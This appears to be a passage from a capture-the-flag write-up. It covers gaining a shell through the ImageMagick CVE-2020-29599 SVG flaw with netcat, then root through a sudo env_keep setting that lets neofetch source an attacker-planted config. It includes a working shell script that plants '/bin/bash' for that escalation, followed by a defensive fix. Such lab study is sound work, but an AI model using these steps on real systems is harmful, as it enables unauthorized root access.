

Found CVE-2020-29599 for this version and from there got this blog. A great blog post to understand the vulnerability and how to exploit it. To exploit this, I created a poc.svg file and transferred it, along with nc (other methods were not working for me, maybe issues with my payload), to the remote system. Now, to get a shell as the other user, we have to copy this svg file to the location where that user is actually running the mogrify tool from. Copy both files, poc.svg and nc, to the location mentioned in the bash file. Start the listener on the port mentioned while creating the svg and wait …

But there is an interesting field added in the sudoers file, and that is env_keep. This is added to preserve environment variables while running as a different user. In the sudoers file its value is set to XDG_CONFIG_HOME. On the GitHub page of neofetch, we can see that this env value is set to "$". So, here is my thought process: I can define this environment variable (XDG_CONFIG_HOME) and point it to thomas'.

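To make the env_keep point concrete, here is an added example (not the writeup's own commands). neofetch resolves its config file as `${XDG_CONFIG_HOME:-${HOME}/.config}/neofetch/config.conf` and sources that file as shell, so when sudo keeps XDG_CONFIG_HOME, whoever controls that directory controls a script that root executes. The sudoers line shown in the comments (`Defaults env_keep += "XDG_CONFIG_HOME"`), the `sudo neofetch` invocation and the path `/home/thomas/.config` are assumptions; the post only says env_keep is set to XDG_CONFIG_HOME and that the variable should point to thomas'.

```shell
#!/bin/sh
# Added example, not the writeup's commands. neofetch resolves its config as
#   ${XDG_CONFIG_HOME:-${HOME}/.config}/neofetch/config.conf
# and sources it as shell, so any command in that file runs with the
# privileges neofetch was started with. Assumptions: sudoers carries a line of
# the form `Defaults env_keep += "XDG_CONFIG_HOME"` and lets thomas run
# neofetch via sudo; /home/thomas/.config is an assumed path.

# neofetch_config_path: mirror neofetch's own resolution of its config file.
neofetch_config_path() {
    printf '%s\n' "${XDG_CONFIG_HOME:-${HOME}/.config}/neofetch/config.conf"
}

# plant_neofetch_payload DIR CMD: create DIR/neofetch/config.conf containing
# CMD and print the path neofetch will source when XDG_CONFIG_HOME=DIR.
plant_neofetch_payload() {
    dir="$1"; cmd="$2"
    mkdir -p "$dir/neofetch"
    printf '%s\n' "$cmd" > "$dir/neofetch/config.conf"
    # Subshell so the override does not leak into the caller's environment.
    ( XDG_CONFIG_HOME="$dir"; neofetch_config_path )
}

# On the target (sudo invocation assumed, not taken from the writeup):
#   plant_neofetch_payload /home/thomas/.config '/bin/bash'
#   export XDG_CONFIG_HOME=/home/thomas/.config
#   sudo neofetch     # env_keep passes XDG_CONFIG_HOME to the root process
```

From the defensive side, keeping a variable in env_keep that decides where a sudo-able program loads executable configuration from is equivalent to handing out a root shell; the fix is to drop XDG_CONFIG_HOME from env_keep (or not to expose neofetch through sudo at all).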